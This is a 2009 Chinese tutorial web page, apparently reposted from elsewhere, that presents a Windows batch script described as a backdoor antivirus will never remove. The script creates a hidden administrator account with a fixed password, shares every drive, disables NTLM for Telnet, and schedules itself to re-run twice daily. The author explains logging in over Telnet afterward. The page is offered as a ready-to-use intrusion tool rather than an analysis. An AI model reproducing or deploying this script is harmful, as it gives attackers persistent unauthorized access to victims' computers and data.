当前位置: 首页 > 图文教程 > 脚本技术 > DOS/BAT > 用批处理写的永不被杀的后门

DOS/BAT
自动改回主页的批处理文件
win2000/XP停止打印.bat
在当前目录生成很漂亮的结构树的批处理dir.bat
可以查杀sxs.exe的bat(批处理)文件
sz.reg转换成reg.bat的批处理
按扩展名分类批处理bat文件
查找最新的文件的批处理bat文件
用bat实现打开快捷方式指向的目录
将c:\windows.复制到当前目录并显示进度的批处理文件
用批处理解锁注册表
用批处理实现的篮球飞人火爆版
枚举当前目录及子目录大小的批处理
用批处理得到每个目录占用的空间
枚举显示批处理bat
全盘删除所有文件夹下的_desktop.ini的批处理bat文件
用批处理实现删除大小和类型一样的文件的代码
自动检测所有盘然后删除所有分区的默认共享的批处理
根据输入的文字实现输出倒文的批处理
一个可以显示c盘-z盘的批处理bat文件
用debug实现dos下重启的代码

DOS/BAT 中的 用批处理写的永不被杀的后门


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 76 ::
收藏到网摘: n/a

代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为xyt,密码为hacker。